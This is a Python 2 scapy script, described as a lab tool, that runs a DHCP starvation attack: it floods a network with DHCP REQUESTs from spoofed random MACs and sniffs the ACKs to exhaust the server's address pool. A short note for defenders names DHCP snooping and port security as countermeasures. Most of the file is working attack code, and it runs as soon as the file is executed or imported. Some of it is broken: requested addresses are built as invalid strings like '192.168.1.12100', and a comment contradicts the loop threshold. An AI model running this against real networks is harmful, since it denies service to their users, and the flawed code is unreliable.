1from scapy.all import *
2from time import sleep
3from threading import Thread
4
class DHCPStarvation(object):
    """Lab script that tries to exhaust a DHCP server's address pool.

    It broadcasts DHCP REQUEST frames, each from a newly generated source
    MAC, and runs a sniffer thread that records the destination address of
    every DHCP ACK it sees. Written for Python 2 (print statements, xrange)
    on top of scapy; all addresses are hard-coded for the author's network.

    For defenders: on the wire this appears as a burst of broadcast DHCP
    REQUESTs, each from a different random source MAC and carrying a BOOTP
    chaddr that is generated separately from the Ethernet source address.
    DHCP snooping with a per-port rate limit, and port security (a cap on
    the number of MAC addresses learned per access port), are the usual
    controls against this traffic pattern.
    """

    def __init__(self):
        """Create the two bookkeeping lists used by the sender and sniffer."""
        # Source MACs already used, so that no MAC is reused for a second
        # request. Seeded with "" because the generation loop in starve()
        # starts from "" and must therefore run at least once.
        self.mac = [""]

        # Destination addresses of the DHCP ACKs seen so far; appended to by
        # handle_dhcp, read by start and starve.
        self.ip = []

    def handle_dhcp(self, pkt):
        """Sniffer callback: record ACKed addresses and report NAKs.

        Args:
            pkt: packet handed over by scapy's sniff().
        """
        if pkt[DHCP]:
            # Message type 5 is DHCPACK: the server has confirmed the lease,
            # so the packet's destination address is recorded as registered.
            # Assumes the message type is the first DHCP option - TODO confirm.
            # 192.168.1.12 is excluded. The original comment named
            # 10.10.111.107 as the author's own host (bt5), which is not to
            # be starved; presumably the literal here plays the same role.
            if pkt[DHCP].options[0][1] == 5 and pkt[IP].dst != "192.168.1.12":
                self.ip.append(pkt[IP].dst)
                print str(pkt[IP].dst) + " registered"

            # Message type 6 is DHCPNAK.
            # Original note: duplicate ACKs may happen due to packet loss.
            elif pkt[DHCP].options[0][1] == 6:
                print "NAK received"

    def listen(self):
        """Sniff DHCP traffic and pass each packet to handle_dhcp."""
        # BPF filter: UDP on the DHCP server/client ports (67/68). store=0
        # tells scapy not to keep the captured packets. No count or timeout
        # is passed, so the call has no stop condition of its own.
        sniff(filter="udp and (port 67 or port 68)",
              prn=self.handle_dhcp, store=0)

    def start(self):
        """Start the sniffer thread, then call starve() until the loop exits."""
        # start packet listening thread
        thread = Thread(target=self.listen)
        thread.start()
        print "Starting DHCP starvation..."

        # Repeat until self.ip holds 254 entries.
        # NOTE(review): the original comment describes 100 targets
        # (.100-.200 minus one host); the threshold in the code is 254, so
        # comment and code disagree.
        while len(self.ip) < 254: self.starve()
        print "Targeted IP address starved"

    def starve(self):
        """Send one DHCP REQUEST for each address not yet present in self.ip."""
        for i in xrange(101):
            # Index 7 is skipped. The original comment ties this to the
            # author's own host (10.10.111.107 in an earlier address plan).
            if i == 7: continue

            # Address to request: the literal "192.168.1.12" with
            # str(100 + i) appended. Skipped when exactly that string is
            # already recorded in self.ip.
            requested_addr = "192.168.1.12" + str(100 + i)
            if requested_addr in self.ip:
                continue

            # Generate a source MAC that is not yet in self.mac and remember it.
            src_mac = ""
            while src_mac in self.mac:
                src_mac = RandMAC()
            self.mac.append(src_mac)

            # Build the request: broadcast Ethernet frame from the generated
            # MAC, IP 0.0.0.0 -> 255.255.255.255, UDP 68 -> 67. The BOOTP
            # client hardware address is a separate random 12-character hex
            # string, not src_mac. The DHCP options ask for requested_addr
            # and name 192.168.1.1 (hard-coded) as the server.
            pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
            pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
            pkt /= UDP(sport=68, dport=67)
            pkt /= BOOTP(chaddr=RandString(12, "0123456789abcdef"))
            pkt /= DHCP(options=[("message-type", "request"),
                                 ("requested_addr", requested_addr),
                                 ("server_id", "192.168.1.1"),
                                 "end"])
            # Sent at layer 2; no interface is given, so scapy's default
            # interface is used.
            sendp(pkt)
            print "Trying to occupy " + requested_addr
            sleep(0.2) # interval to avoid congestion and packet loss
70
# The __main__ guard below is commented out in the paste, so the two
# statements after it run whenever this file is executed or imported.
#if __name__ == "__main__":
starvation = DHCPStarvation()
starvation.start()